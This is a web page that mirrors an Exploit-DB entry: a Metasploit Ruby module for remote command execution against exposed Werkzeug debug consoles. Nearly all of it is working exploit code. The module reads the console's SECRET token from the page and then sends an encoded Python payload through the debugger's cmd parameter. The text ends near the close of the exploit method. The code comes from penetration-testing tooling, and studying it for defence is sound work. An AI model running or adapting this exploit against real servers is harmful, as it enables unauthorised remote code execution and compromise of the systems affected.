Werkzeug – Debug Shell Command Execution (Metasploit) - 体验盒子

作者： Metasploit

日期： 2015-08-18

类别：

remote

平台：

Python

来源：https://www.exploit-db.com/exploits/37814/

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

29

30

31

32

33

34

35

36

37

38

39

40

41

42

43

44

45

46

47

48

49

50

51

52

53

54

55

56

57

58

59

60

61

62

63

64

65

66

67

68

69

70

71

72

73

74

75

76

77

78

79

80

81

82

83

84

85

86

87

88

##

# This module requires Metasploit: http://metasploit.com/download

# Current source: https://github.com/rapid7/metasploit-framework

##

require 'msf/core'

require 'rex'

class Metasploit4 < Msf::Exploit::Remote

Rank = ExcellentRanking

include Msf::Exploit::Remote::HttpClient

def initialize(info = {})

super(update_info(info,

'Name' => 'Werkzeug Debug Shell Command Execution',

'Description'=> %q{

This module will exploit the Werkzeug debug console to put down a

Python shell. This debugger "must never be used on production

machines" but sometimes slips passed testing.

Tested against:

0.9.6 on Debian

0.9.6 on Centos

0.10on Debian

},

'Author' => 'h00die <mike[at]shorebreaksecurity.com>',

'References' =>

[

['URL', 'http://werkzeug.pocoo.org/docs/0.10/debug/#enabling-the-debugger']

],

'License'=> MSF_LICENSE,

'Platform' => ['python'],

'Targets'=> [[ 'werkzeug 0.10 and older', {}]],

'Arch' => ARCH_PYTHON,

'DefaultTarget'=> 0,

'DisclosureDate' => 'Jun 28 2015'

))

register_options(

[

OptString.new('TARGETURI', [true, 'URI to the console', '/console'])

], self.class

)

end

def check

res = send_request_cgi(

'method' => 'GET',

'uri'=> normalize_uri(datastore['TARGETURI'])

)

# https://github.com/mitsuhiko/werkzeug/blob/cc8c8396ecdbc25bedc1cfdddfe8df2387b72ae3/werkzeug/debug/tbtools.py#L67

if res && res.body =~ /Werkzeug powered traceback interpreter/

return Exploit::CheckCode::Appears

end

Exploit::CheckCode::Safe

end

def exploit

# first we need to get the SECRET code

res = send_request_cgi(

'method' => 'GET',

'uri'=> normalize_uri(datastore['TARGETURI'])

)

if res && res.body =~ /SECRET = "([a-zA-Z0-9]{20})";/

secret = $1

vprint_status("Secret Code: #{secret}")

send_request_cgi(

'method' => 'GET',

'uri'=> normalize_uri(datastore['TARGETURI']),

'vars_get' => {

'__debugger__' => 'yes',

'cmd'=> payload.encoded,

'frm'=> '0',

's'=> secret

}

)

else

print_error('Secret code not detected.')

end